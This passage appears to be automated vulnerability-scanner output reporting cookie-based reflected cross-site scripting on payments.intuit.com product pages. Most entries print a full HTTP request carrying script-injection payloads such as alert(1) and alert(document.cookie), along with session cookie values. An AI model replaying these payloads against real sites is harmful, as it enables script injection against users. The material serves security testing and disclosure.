s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T166fb36<script>alert(1)</script>4c918b363ab;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66866"><script>alert(1)</script>32afa1f3f6c was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-credit-card-processing-services.jsp?scid=ips_pc90_banner HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1666866"><script>alert(1)</script>32afa1f3f6c;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload d3b88<script>alert(1)</script>6e2a002a14f was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-processing.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16d3b88<script>alert(1)</script>6e2a002a14f;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19d02"><script>alert(1)</script>94241c27c76 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-processing.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1619d02"><script>alert(1)</script>94241c27c76;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d5f4"><script>alert(1)</script>87efd050621 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/ HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T168d5f4"><script>alert(1)</script>87efd050621;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 62983<script>alert(1)</script>3ae0052e269 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/ HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1662983<script>alert(1)</script>3ae0052e269;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 666da<script>alert(1)</script>b41e58df354 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/ach.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16666da<script>alert(1)</script>b41e58df354;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d083f"><script>alert(1)</script>9f3ce87ff72 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/ach.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16d083f"><script>alert(1)</script>9f3ce87ff72;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 237a8"><script>alert(1)</script>3c9a92fa8e4 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/credit-card-processing-services.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16237a8"><script>alert(1)</script>3c9a92fa8e4;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 72ea0<script>alert(1)</script>71ad3f15145 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/credit-card-processing-services.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1672ea0<script>alert(1)</script>71ad3f15145;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload e45dc<script>alert(1)</script>7c80ec2b9be was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/custom-gift-card-program.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16e45dc<script>alert(1)</script>7c80ec2b9be;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21ddf"><script>alert(1)</script>911cfbd5c1d was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/custom-gift-card-program.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1621ddf"><script>alert(1)</script>911cfbd5c1d;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 50dd2<script>alert(1)</script>22b5eb89f33 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/online-credit-card-processing.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1650dd2<script>alert(1)</script>22b5eb89f33;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd521"><script>alert(1)</script>a06b40a6939 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
